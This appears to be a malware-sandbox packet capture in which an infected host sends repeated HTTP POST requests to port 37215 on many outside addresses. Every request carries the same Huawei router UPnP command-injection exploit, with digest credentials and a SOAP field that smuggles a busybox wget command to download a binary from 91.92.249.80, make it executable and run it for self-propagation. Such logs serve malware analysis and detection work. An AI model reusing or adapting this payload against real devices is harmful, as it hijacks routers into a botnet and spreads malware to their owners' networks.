                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1434192.168.2.235507641.176.200.18437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.472706079 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1435192.168.2.2346652155.76.0.3137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.472712040 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1436192.168.2.235285641.42.140.18037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.472778082 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1437192.168.2.2343644157.97.56.3337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.473196030 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1438192.168.2.2347634197.101.25.13837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.473275900 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1439192.168.2.2339348197.180.199.4937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.473294020 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1440192.168.2.234384241.218.124.13037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.473294020 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1441192.168.2.2355496157.55.76.4537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.473352909 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1442192.168.2.23333549.118.243.18237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.473355055 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1443192.168.2.2359558197.161.197.9037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.473357916 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
